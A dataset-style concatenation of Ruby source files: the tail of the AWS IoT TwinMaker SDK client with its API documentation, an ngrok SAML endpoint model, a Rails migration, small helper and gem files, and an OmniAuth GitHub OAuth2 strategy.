# resp.property_values["Name"].property_reference.entity_id #=> String
# resp.property_values["Name"].property_reference.external_id_property #=> Hash
# resp.property_values["Name"].property_reference.external_id_property["String"] #=> String
# resp.property_values["Name"].property_reference.property_name #=> String
# resp.property_values["Name"].property_value.boolean_value #=> Boolean
# resp.property_values["Name"].property_value.double_value #=> Float
# resp.property_values["Name"].property_value.expression #=> String
# resp.property_values["Name"].property_value.integer_value #=> Integer
# resp.property_values["Name"].property_value.list_value #=> Array
# resp.property_values["Name"].property_value.list_value[0] #=> Types::DataValue
# resp.property_values["Name"].property_value.long_value #=> Integer
# resp.property_values["Name"].property_value.map_value #=> Hash
# resp.property_values["Name"].property_value.map_value["String"] #=> Types::DataValue
# resp.property_values["Name"].property_value.relationship_value.target_component_name #=> String
# resp.property_values["Name"].property_value.relationship_value.target_entity_id #=> String
# resp.property_values["Name"].property_value.string_value #=> String
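    #
    # A hedged usage sketch (not from the generated SDK docs); the component,
    # entity, and property names below are placeholders.
    #
    # @example Fetch the latest value of a single selected property
    #
    #   resp = client.get_property_value({
    #     component_name: "myComponent", # placeholder name
    #     entity_id: "my-entity-id",     # placeholder ID
    #     selected_properties: ["temperature"],
    #     workspace_id: "MyWorkspace",
    #   })
    #   latest = resp.property_values["temperature"]
    #   puts latest.property_value.double_value if latest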
#
# @overload get_property_value(params = {})
# @param [Hash] params ({})
def get_property_value(params = {}, options = {})
req = build_request(:get_property_value, params)
req.send_request(options)
end
# Retrieves information about the history of a time series property
# value for a component, component type, entity, or workspace.
#
# You must specify a value for `workspaceId`. For entity-specific
# queries, specify values for `componentName` and `entityId`. For
    # cross-entity queries, specify a value for `componentTypeId`.
#
# @option params [String] :component_name
# The name of the component.
#
# @option params [String] :component_type_id
# The ID of the component type.
#
# @option params [Time,DateTime,Date,Integer,String] :end_date_time
# The date and time of the latest property value to return.
#
# @option params [String] :end_time
# The ISO8601 DateTime of the latest property value to return.
#
# For more information about the ISO8601 DateTime format, see the data
# type [PropertyValue][1].
#
#
#
# [1]: https://docs.aws.amazon.com/roci/latest/roci-api/API_PropertyValue.html
#
# @option params [String] :entity_id
# The ID of the entity.
#
# @option params [Types::InterpolationParameters] :interpolation
# An object that specifies the interpolation type and the interval over
# which to interpolate data.
#
# @option params [Integer] :max_results
# The maximum number of results to return.
#
# @option params [String] :next_token
# The string that specifies the next page of results.
#
# @option params [String] :order_by_time
# The time direction to use in the result order.
#
# @option params [Array<Types::PropertyFilter>] :property_filters
# A list of objects that filter the property value history request.
#
# @option params [required, Array<String>] :selected_properties
# A list of properties whose value histories the request retrieves.
#
# @option params [Time,DateTime,Date,Integer,String] :start_date_time
# The date and time of the earliest property value to return.
#
# @option params [String] :start_time
# The ISO8601 DateTime of the earliest property value to return.
#
# For more information about the ISO8601 DateTime format, see the data
# type [PropertyValue][1].
#
#
#
# [1]: https://docs.aws.amazon.com/roci/latest/roci-api/API_PropertyValue.html
#
# @option params [required, String] :workspace_id
# The ID of the workspace.
#
# @return [Types::GetPropertyValueHistoryResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetPropertyValueHistoryResponse#next_token #next_token} => String
# * {Types::GetPropertyValueHistoryResponse#property_values #property_values} => Array<Types::PropertyValueHistory>
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.get_property_value_history({
# component_name: "Name",
# component_type_id: "ComponentTypeId",
# end_date_time: Time.now,
# end_time: "Time",
# entity_id: "EntityId",
# interpolation: {
# interpolation_type: "LINEAR", # accepts LINEAR
# interval_in_seconds: 1,
# },
# max_results: 1,
# next_token: "NextToken",
# order_by_time: "ASCENDING", # accepts ASCENDING, DESCENDING
# property_filters: [
# {
# operator: "String",
# property_name: "String",
# value: {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: [
# {
# # recursive DataValue
# },
# ],
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# },
# ],
# selected_properties: ["String"], # required
# start_date_time: Time.now,
# start_time: "Time",
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.next_token #=> String
# resp.property_values #=> Array
# resp.property_values[0].entity_property_reference.component_name #=> String
# resp.property_values[0].entity_property_reference.entity_id #=> String
# resp.property_values[0].entity_property_reference.external_id_property #=> Hash
# resp.property_values[0].entity_property_reference.external_id_property["String"] #=> String
# resp.property_values[0].entity_property_reference.property_name #=> String
# resp.property_values[0].values #=> Array
# resp.property_values[0].values[0].time #=> String
# resp.property_values[0].values[0].timestamp #=> Time
# resp.property_values[0].values[0].value.boolean_value #=> Boolean
# resp.property_values[0].values[0].value.double_value #=> Float
# resp.property_values[0].values[0].value.expression #=> String
# resp.property_values[0].values[0].value.integer_value #=> Integer
# resp.property_values[0].values[0].value.list_value #=> Array
# resp.property_values[0].values[0].value.list_value[0] #=> Types::DataValue
# resp.property_values[0].values[0].value.long_value #=> Integer
# resp.property_values[0].values[0].value.map_value #=> Hash
# resp.property_values[0].values[0].value.map_value["String"] #=> Types::DataValue
# resp.property_values[0].values[0].value.relationship_value.target_component_name #=> String
# resp.property_values[0].values[0].value.relationship_value.target_entity_id #=> String
# resp.property_values[0].values[0].value.string_value #=> String
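    #
    # A hedged usage sketch (not from the generated SDK docs): it relies only on
    # the pageable response noted above, and every name is a placeholder.
    #
    # @example Page through the history of one time-series property
    #
    #   resp = client.get_property_value_history({
    #     component_name: "myComponent", # placeholder name
    #     entity_id: "my-entity-id",     # placeholder ID
    #     selected_properties: ["temperature"],
    #     start_date_time: Time.now - 3600,
    #     end_date_time: Time.now,
    #     workspace_id: "MyWorkspace",
    #   })
    #   resp.each do |page|
    #     page.property_values.each do |history|
    #       history.values.each { |v| puts "#{v.timestamp}: #{v.value.double_value}" }
    #     end
    #   end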
#
# @overload get_property_value_history(params = {})
# @param [Hash] params ({})
def get_property_value_history(params = {}, options = {})
req = build_request(:get_property_value_history, params)
req.send_request(options)
end
# Retrieves information about a scene.
#
# @option params [required, String] :scene_id
# The ID of the scene.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the scene.
#
# @return [Types::GetSceneResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetSceneResponse#arn #arn} => String
# * {Types::GetSceneResponse#capabilities #capabilities} => Array<String>
# * {Types::GetSceneResponse#content_location #content_location} => String
# * {Types::GetSceneResponse#creation_date_time #creation_date_time} => Time
# * {Types::GetSceneResponse#description #description} => String
# * {Types::GetSceneResponse#scene_id #scene_id} => String
# * {Types::GetSceneResponse#update_date_time #update_date_time} => Time
# * {Types::GetSceneResponse#workspace_id #workspace_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.get_scene({
# scene_id: "Id", # required
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.arn #=> String
# resp.capabilities #=> Array
# resp.capabilities[0] #=> String
# resp.content_location #=> String
# resp.creation_date_time #=> Time
# resp.description #=> String
# resp.scene_id #=> String
# resp.update_date_time #=> Time
# resp.workspace_id #=> String
#
# @overload get_scene(params = {})
# @param [Hash] params ({})
def get_scene(params = {}, options = {})
req = build_request(:get_scene, params)
req.send_request(options)
end
# Retrieves information about a workspace.
#
# @option params [required, String] :workspace_id
# The ID of the workspace.
#
# @return [Types::GetWorkspaceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetWorkspaceResponse#arn #arn} => String
# * {Types::GetWorkspaceResponse#creation_date_time #creation_date_time} => Time
# * {Types::GetWorkspaceResponse#description #description} => String
# * {Types::GetWorkspaceResponse#role #role} => String
# * {Types::GetWorkspaceResponse#s3_location #s3_location} => String
# * {Types::GetWorkspaceResponse#update_date_time #update_date_time} => Time
# * {Types::GetWorkspaceResponse#workspace_id #workspace_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.get_workspace({
# workspace_id: "IdOrArn", # required
# })
#
# @example Response structure
#
# resp.arn #=> String
# resp.creation_date_time #=> Time
# resp.description #=> String
# resp.role #=> String
# resp.s3_location #=> String
# resp.update_date_time #=> Time
# resp.workspace_id #=> String
#
# @overload get_workspace(params = {})
# @param [Hash] params ({})
def get_workspace(params = {}, options = {})
req = build_request(:get_workspace, params)
req.send_request(options)
end
# Lists all component types in a workspace.
#
# @option params [Array<Types::ListComponentTypesFilter>] :filters
# A list of objects that filter the request.
#
# @option params [Integer] :max_results
# The maximum number of results to display.
#
# @option params [String] :next_token
# The string that specifies the next page of results.
#
# @option params [required, String] :workspace_id
# The ID of the workspace.
#
# @return [Types::ListComponentTypesResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListComponentTypesResponse#component_type_summaries #component_type_summaries} => Array<Types::ComponentTypeSummary>
# * {Types::ListComponentTypesResponse#max_results #max_results} => Integer
# * {Types::ListComponentTypesResponse#next_token #next_token} => String
# * {Types::ListComponentTypesResponse#workspace_id #workspace_id} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_component_types({
# filters: [
# {
# extends_from: "ComponentTypeId",
# is_abstract: false,
# namespace: "String",
# },
# ],
# max_results: 1,
# next_token: "NextToken",
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.component_type_summaries #=> Array
# resp.component_type_summaries[0].arn #=> String
# resp.component_type_summaries[0].component_type_id #=> String
# resp.component_type_summaries[0].creation_date_time #=> Time
# resp.component_type_summaries[0].description #=> String
# resp.component_type_summaries[0].status.error.code #=> String, one of "VALIDATION_ERROR", "INTERNAL_FAILURE"
# resp.component_type_summaries[0].status.error.message #=> String
# resp.component_type_summaries[0].status.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
# resp.component_type_summaries[0].update_date_time #=> Time
# resp.max_results #=> Integer
# resp.next_token #=> String
# resp.workspace_id #=> String
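    #
    # A hedged usage sketch (not from the generated SDK docs): the filter shape
    # and summary fields come from the structures above; the workspace ID is a
    # placeholder.
    #
    # @example List non-abstract component types across all pages
    #
    #   resp = client.list_component_types({
    #     filters: [{ is_abstract: false }],
    #     workspace_id: "MyWorkspace", # placeholder ID
    #   })
    #   resp.each do |page|
    #     page.component_type_summaries.each { |s| puts s.component_type_id }
    #   end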
#
# @overload list_component_types(params = {})
# @param [Hash] params ({})
def list_component_types(params = {}, options = {})
req = build_request(:list_component_types, params)
req.send_request(options)
end
# Lists all entities in a workspace.
#
# @option params [Array<Types::ListEntitiesFilter>] :filters
# A list of objects that filter the request.
#
# <note markdown="1"> Only one object is accepted as a valid input.
#
# </note>
#
# @option params [Integer] :max_results
# The maximum number of results to display.
#
# @option params [String] :next_token
# The string that specifies the next page of results.
#
# @option params [required, String] :workspace_id
# The ID of the workspace.
#
# @return [Types::ListEntitiesResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListEntitiesResponse#entity_summaries #entity_summaries} => Array<Types::EntitySummary>
# * {Types::ListEntitiesResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_entities({
# filters: [
# {
# component_type_id: "ComponentTypeId",
# external_id: "String",
# parent_entity_id: "ParentEntityId",
# },
# ],
# max_results: 1,
# next_token: "NextToken",
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.entity_summaries #=> Array
# resp.entity_summaries[0].arn #=> String
# resp.entity_summaries[0].creation_date_time #=> Time
# resp.entity_summaries[0].description #=> String
# resp.entity_summaries[0].entity_id #=> String
# resp.entity_summaries[0].entity_name #=> String
# resp.entity_summaries[0].has_child_entities #=> Boolean
# resp.entity_summaries[0].parent_entity_id #=> String
# resp.entity_summaries[0].status.error.code #=> String, one of "VALIDATION_ERROR", "INTERNAL_FAILURE"
# resp.entity_summaries[0].status.error.message #=> String
# resp.entity_summaries[0].status.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
# resp.entity_summaries[0].update_date_time #=> Time
# resp.next_token #=> String
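    #
    # A hedged usage sketch (not from the generated SDK docs). As noted above,
    # only one filter object is accepted; the parent entity ID is a placeholder.
    #
    # @example List the direct children of one entity
    #
    #   resp = client.list_entities({
    #     filters: [{ parent_entity_id: "my-parent-entity-id" }], # placeholder ID
    #     workspace_id: "MyWorkspace",
    #   })
    #   resp.entity_summaries.each { |summary| puts summary.entity_name }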
#
# @overload list_entities(params = {})
# @param [Hash] params ({})
def list_entities(params = {}, options = {})
req = build_request(:list_entities, params)
req.send_request(options)
end
# Lists all scenes in a workspace.
#
# @option params [Integer] :max_results
# Specifies the maximum number of results to display.
#
# @option params [String] :next_token
# The string that specifies the next page of results.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the scenes.
#
# @return [Types::ListScenesResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListScenesResponse#next_token #next_token} => String
# * {Types::ListScenesResponse#scene_summaries #scene_summaries} => Array<Types::SceneSummary>
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_scenes({
# max_results: 1,
# next_token: "NextToken",
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.next_token #=> String
# resp.scene_summaries #=> Array
# resp.scene_summaries[0].arn #=> String
# resp.scene_summaries[0].content_location #=> String
# resp.scene_summaries[0].creation_date_time #=> Time
# resp.scene_summaries[0].description #=> String
# resp.scene_summaries[0].scene_id #=> String
# resp.scene_summaries[0].update_date_time #=> Time
#
# @overload list_scenes(params = {})
# @param [Hash] params ({})
def list_scenes(params = {}, options = {})
req = build_request(:list_scenes, params)
req.send_request(options)
end
# Lists all tags associated with a resource.
#
# @option params [Integer] :max_results
# The maximum number of results to display.
#
# @option params [String] :next_token
# The string that specifies the next page of results.
#
# @option params [required, String] :resource_arn
# The ARN of the resource.
#
# @return [Types::ListTagsForResourceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListTagsForResourceResponse#next_token #next_token} => String
# * {Types::ListTagsForResourceResponse#tags #tags} => Hash<String,String>
#
# @example Request syntax with placeholder values
#
# resp = client.list_tags_for_resource({
# max_results: 1,
# next_token: "NextToken",
# resource_arn: "TwinMakerArn", # required
# })
#
# @example Response structure
#
# resp.next_token #=> String
# resp.tags #=> Hash
# resp.tags["TagKey"] #=> String
#
# @overload list_tags_for_resource(params = {})
# @param [Hash] params ({})
def list_tags_for_resource(params = {}, options = {})
req = build_request(:list_tags_for_resource, params)
req.send_request(options)
end
# Retrieves information about workspaces in the current account.
#
# @option params [Integer] :max_results
# The maximum number of results to display.
#
# @option params [String] :next_token
# The string that specifies the next page of results.
#
# @return [Types::ListWorkspacesResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListWorkspacesResponse#next_token #next_token} => String
# * {Types::ListWorkspacesResponse#workspace_summaries #workspace_summaries} => Array<Types::WorkspaceSummary>
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_workspaces({
# max_results: 1,
# next_token: "NextToken",
# })
#
# @example Response structure
#
# resp.next_token #=> String
# resp.workspace_summaries #=> Array
# resp.workspace_summaries[0].arn #=> String
# resp.workspace_summaries[0].creation_date_time #=> Time
# resp.workspace_summaries[0].description #=> String
# resp.workspace_summaries[0].update_date_time #=> Time
# resp.workspace_summaries[0].workspace_id #=> String
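    #
    # A hedged usage sketch (not from the generated SDK docs) that only walks the
    # pageable response noted above.
    #
    # @example Collect the ID of every workspace in the account
    #
    #   workspace_ids = []
    #   client.list_workspaces.each do |page|
    #     workspace_ids.concat(page.workspace_summaries.map(&:workspace_id))
    #   end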
#
# @overload list_workspaces(params = {})
# @param [Hash] params ({})
def list_workspaces(params = {}, options = {})
req = build_request(:list_workspaces, params)
req.send_request(options)
end
# Adds tags to a resource.
#
# @option params [required, String] :resource_arn
# The ARN of the resource.
#
# @option params [required, Hash<String,String>] :tags
# Metadata to add to this resource.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.tag_resource({
# resource_arn: "TwinMakerArn", # required
# tags: { # required
# "TagKey" => "TagValue",
# },
# })
#
# @overload tag_resource(params = {})
# @param [Hash] params ({})
def tag_resource(params = {}, options = {})
req = build_request(:tag_resource, params)
req.send_request(options)
end
# Removes tags from a resource.
#
# @option params [required, String] :resource_arn
# The ARN of the resource.
#
# @option params [required, Array<String>] :tag_keys
# A list of tag key names to remove from the resource. You don't
# specify the value. Both the key and its associated value are removed.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.untag_resource({
# resource_arn: "TwinMakerArn", # required
# tag_keys: ["TagKey"], # required
# })
#
# @overload untag_resource(params = {})
# @param [Hash] params ({})
def untag_resource(params = {}, options = {})
req = build_request(:untag_resource, params)
req.send_request(options)
end
# Updates information in a component type.
#
# @option params [required, String] :component_type_id
# The ID of the component type.
#
# @option params [String] :description
# The description of the component type.
#
# @option params [Array<String>] :extends_from
# Specifies the component type that this component type extends.
#
# @option params [Hash<String,Types::FunctionRequest>] :functions
# An object that maps strings to the functions in the component type.
# Each string in the mapping must be unique to this object.
#
# @option params [Boolean] :is_singleton
# A Boolean value that specifies whether an entity can have more than
# one component of this type.
#
# @option params [Hash<String,Types::PropertyDefinitionRequest>] :property_definitions
# An object that maps strings to the property definitions in the
# component type. Each string in the mapping must be unique to this
# object.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the component type.
#
# @return [Types::UpdateComponentTypeResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::UpdateComponentTypeResponse#arn #arn} => String
# * {Types::UpdateComponentTypeResponse#component_type_id #component_type_id} => String
# * {Types::UpdateComponentTypeResponse#state #state} => String
# * {Types::UpdateComponentTypeResponse#workspace_id #workspace_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.update_component_type({
# component_type_id: "ComponentTypeId", # required
# description: "Description",
# extends_from: ["ComponentTypeId"],
# functions: {
# "Name" => {
# implemented_by: {
# is_native: false,
# lambda: {
# arn: "LambdaArn", # required
# },
# },
# required_properties: ["Name"],
# scope: "ENTITY", # accepts ENTITY, WORKSPACE
# },
# },
# is_singleton: false,
# property_definitions: {
# "Name" => {
# configuration: {
# "Name" => "Value",
# },
# data_type: {
# allowed_values: [
# {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: {
# # recursive DataValueList
# },
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# ],
# nested_type: {
# # recursive DataType
# },
# relationship: {
# relationship_type: "String",
# target_component_type_id: "ComponentTypeId",
# },
# type: "RELATIONSHIP", # required, accepts RELATIONSHIP, STRING, LONG, BOOLEAN, INTEGER, DOUBLE, LIST, MAP
# unit_of_measure: "String",
# },
# default_value: {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: [
# {
# # recursive DataValue
# },
# ],
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# is_external_id: false,
# is_required_in_entity: false,
# is_stored_externally: false,
# is_time_series: false,
# },
# },
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.arn #=> String
# resp.component_type_id #=> String
# resp.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
# resp.workspace_id #=> String
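    #
    # A hedged usage sketch (not from the generated SDK docs): it reuses only the
    # request fields shown above, the names are placeholders, and it makes no
    # claim about how the service merges existing property definitions.
    #
    # @example Send an update containing a single STRING property definition
    #
    #   resp = client.update_component_type({
    #     component_type_id: "my.component.type", # placeholder ID
    #     workspace_id: "MyWorkspace",            # placeholder ID
    #     property_definitions: {
    #       "serialNumber" => {                   # placeholder property name
    #         data_type: { type: "STRING" },
    #         is_required_in_entity: false,
    #         is_time_series: false,
    #       },
    #     },
    #   })
    #   puts resp.state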
#
# @overload update_component_type(params = {})
# @param [Hash] params ({})
def update_component_type(params = {}, options = {})
req = build_request(:update_component_type, params)
req.send_request(options)
end
# Updates an entity.
#
# @option params [Hash<String,Types::ComponentUpdateRequest>] :component_updates
# An object that maps strings to the component updates in the request.
# Each string in the mapping must be unique to this object.
#
# @option params [String] :description
# The description of the entity.
#
# @option params [required, String] :entity_id
# The ID of the entity.
#
# @option params [String] :entity_name
# The name of the entity.
#
# @option params [Types::ParentEntityUpdateRequest] :parent_entity_update
# An object that describes the update request for a parent entity.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the entity.
#
# @return [Types::UpdateEntityResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::UpdateEntityResponse#state #state} => String
# * {Types::UpdateEntityResponse#update_date_time #update_date_time} => Time
#
# @example Request syntax with placeholder values
#
# resp = client.update_entity({
# component_updates: {
# "Name" => {
# component_type_id: "ComponentTypeId",
# description: "Description",
# property_updates: {
# "Name" => {
# definition: {
# configuration: {
# "Name" => "Value",
# },
# data_type: {
# allowed_values: [
# {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: {
# # recursive DataValueList
# },
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# ],
# nested_type: {
# # recursive DataType
# },
# relationship: {
# relationship_type: "String",
# target_component_type_id: "ComponentTypeId",
# },
# type: "RELATIONSHIP", # required, accepts RELATIONSHIP, STRING, LONG, BOOLEAN, INTEGER, DOUBLE, LIST, MAP
# unit_of_measure: "String",
# },
# default_value: {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: [
# {
# # recursive DataValue
# },
# ],
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# is_external_id: false,
# is_required_in_entity: false,
# is_stored_externally: false,
# is_time_series: false,
# },
# update_type: "UPDATE", # accepts UPDATE, DELETE, CREATE
# value: {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: [
# {
# # recursive DataValue
# },
# ],
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# },
# },
# update_type: "CREATE", # accepts CREATE, UPDATE, DELETE
# },
# },
# description: "Description",
# entity_id: "EntityId", # required
# entity_name: "EntityName",
# parent_entity_update: {
# parent_entity_id: "ParentEntityId",
# update_type: "UPDATE", # required, accepts UPDATE, DELETE
# },
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
# resp.update_date_time #=> Time
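    #
    # A hedged usage sketch (not from the generated SDK docs); the component and
    # property names below are placeholders.
    #
    # @example Update a single property value on one component
    #
    #   resp = client.update_entity({
    #     entity_id: "my-entity-id",   # placeholder ID
    #     workspace_id: "MyWorkspace", # placeholder ID
    #     component_updates: {
    #       "myComponent" => {
    #         update_type: "UPDATE",
    #         property_updates: {
    #           "temperature" => {
    #             update_type: "UPDATE",
    #             value: { double_value: 22.5 },
    #           },
    #         },
    #       },
    #     },
    #   })
    #   puts resp.state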
#
# @overload update_entity(params = {})
# @param [Hash] params ({})
def update_entity(params = {}, options = {})
req = build_request(:update_entity, params)
req.send_request(options)
end
# Updates a scene.
#
# @option params [Array<String>] :capabilities
# A list of capabilities that the scene uses to render.
#
# @option params [String] :content_location
# The relative path that specifies the location of the content
# definition file.
#
# @option params [String] :description
# The description of this scene.
#
# @option params [required, String] :scene_id
# The ID of the scene.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the scene.
#
# @return [Types::UpdateSceneResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::UpdateSceneResponse#update_date_time #update_date_time} => Time
#
# @example Request syntax with placeholder values
#
# resp = client.update_scene({
# capabilities: ["SceneCapability"],
# content_location: "S3Url",
# description: "Description",
# scene_id: "Id", # required
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.update_date_time #=> Time
#
# @overload update_scene(params = {})
# @param [Hash] params ({})
def update_scene(params = {}, options = {})
req = build_request(:update_scene, params)
req.send_request(options)
end
# Updates a workspace.
#
# @option params [String] :description
# The description of the workspace.
#
# @option params [String] :role
# The ARN of the execution role associated with the workspace.
#
# @option params [required, String] :workspace_id
# The ID of the workspace.
#
# @return [Types::UpdateWorkspaceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::UpdateWorkspaceResponse#update_date_time #update_date_time} => Time
#
# @example Request syntax with placeholder values
#
# resp = client.update_workspace({
# description: "Description",
# role: "RoleArn",
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.update_date_time #=> Time
#
# @overload update_workspace(params = {})
# @param [Hash] params ({})
def update_workspace(params = {}, options = {})
req = build_request(:update_workspace, params)
req.send_request(options)
end
# @!endgroup
# @param params ({})
# @api private
def build_request(operation_name, params = {})
handlers = @handlers.for(operation_name)
context = Seahorse::Client::RequestContext.new(
operation_name: operation_name,
operation: config.api.operation(operation_name),
client: self,
params: params,
config: config)
context[:gem_name] = 'aws-sdk-iottwinmaker'
context[:gem_version] = '1.5.0'
Seahorse::Client::Request.new(handlers, context)
end
# @api private
# @deprecated
def waiter_names
[]
end
class << self
# @api private
attr_reader :identifier
# @api private
def errors_module
Errors
end
end
end
end
| 42.937238 | 175 | 0.610223 |
1a11eaf0910408989912846828d836c7a08bec38 | 1,697 | # frozen_string_literal: true
module NgrokAPI
module Models
class EndpointSAML
attr_reader :client,
:result,
:enabled,
:options_passthrough,
:cookie_prefix,
:inactivity_timeout,
:maximum_duration,
:idp_metadata_url,
:idp_metadata,
:force_authn,
:allow_idp_initiated,
:authorized_groups,
:entity_id,
:assertion_consumer_service_url,
:single_logout_url,
:request_signing_certificate_pem,
:metadata_url,
:nameid_format
def initialize(client:, result:)
@client = client
@result = result
@enabled = @result['enabled']
@options_passthrough = @result['options_passthrough']
@cookie_prefix = @result['cookie_prefix']
@inactivity_timeout = @result['inactivity_timeout']
@maximum_duration = @result['maximum_duration']
@idp_metadata_url = @result['idp_metadata_url']
@idp_metadata = @result['idp_metadata']
@force_authn = @result['force_authn']
@allow_idp_initiated = @result['allow_idp_initiated']
@authorized_groups = @result['authorized_groups']
@entity_id = @result['entity_id']
@assertion_consumer_service_url = @result['assertion_consumer_service_url']
@single_logout_url = @result['single_logout_url']
@request_signing_certificate_pem = @result['request_signing_certificate_pem']
@metadata_url = @result['metadata_url']
@nameid_format = @result['nameid_format']
end
def ==(other)
@result == other.result
end
def to_s
@result.to_s
end
end
end
end
| 30.303571 | 85 | 0.63406 |
625cfe4e547986695d67151f5e76578454c3b2f4 | 22 | module PageHelper
end
| 7.333333 | 17 | 0.863636 |
210d05dad8a34ce0ac0d0054745393dcd00bab3a | 129 | class AddEndsAtToReservations < ActiveRecord::Migration
def change
add_column :reservations, :ends_at, :datetime
end
end
| 21.5 | 55 | 0.782946 |
01fce725860e7246db372d55e35215e0661017fb | 173 | require_relative "./gawk/version"
require_relative "./gawk/cli"
require_relative "./gawk/engine"
require_relative "./gawk/table"
module Gawk
# Your code goes here...
end
| 19.222222 | 33 | 0.751445 |
7ac5a15e0cd0cf29886c3794b0ef85cb6a390ca4 | 2,205 | require 'omniauth-oauth2'
module OmniAuth
module Strategies
class GitHub < OmniAuth::Strategies::OAuth2
option :client_options, {
:site => 'https://api.github.com',
:authorize_url => 'https://github.com/login/oauth/authorize',
:token_url => 'https://github.com/login/oauth/access_token'
}
def request_phase
super
end
def authorize_params
super.tap do |params|
%w[scope client_options].each do |v|
if request.params[v]
params[v.to_sym] = request.params[v]
end
end
end
end
uid { raw_info['id'].to_s }
info do
{
'nickname' => raw_info['login'],
'email' => email,
'name' => raw_info['name'],
'image' => raw_info['avatar_url'],
'urls' => {
'GitHub' => raw_info['html_url'],
'Blog' => raw_info['blog'],
},
}
end
extra do
{:raw_info => raw_info, :all_emails => emails, :scope => scope }
end
def raw_info
access_token.options[:mode] = :header
@raw_info ||= access_token.get('user').parsed
end
def email
(email_access_allowed?) ? primary_email : raw_info['email']
end
def scope
access_token['scope']
end
def primary_email
primary = emails.find{ |i| i['primary'] && i['verified'] }
primary && primary['email'] || nil
end
# The new /user/emails API - http://developer.github.com/v3/users/emails/#future-response
def emails
return [] unless email_access_allowed?
access_token.options[:mode] = :header
@emails ||= access_token.get('user/emails', :headers => { 'Accept' => 'application/vnd.github.v3' }).parsed
end
def email_access_allowed?
return false unless options['scope']
email_scopes = ['user', 'user:email']
scopes = options['scope'].split(',')
(scopes & email_scopes).any?
end
def callback_url
full_host + script_name + callback_path
end
end
end
end
OmniAuth.config.add_camelization 'github', 'GitHub'
| 25.941176 | 115 | 0.555556 |
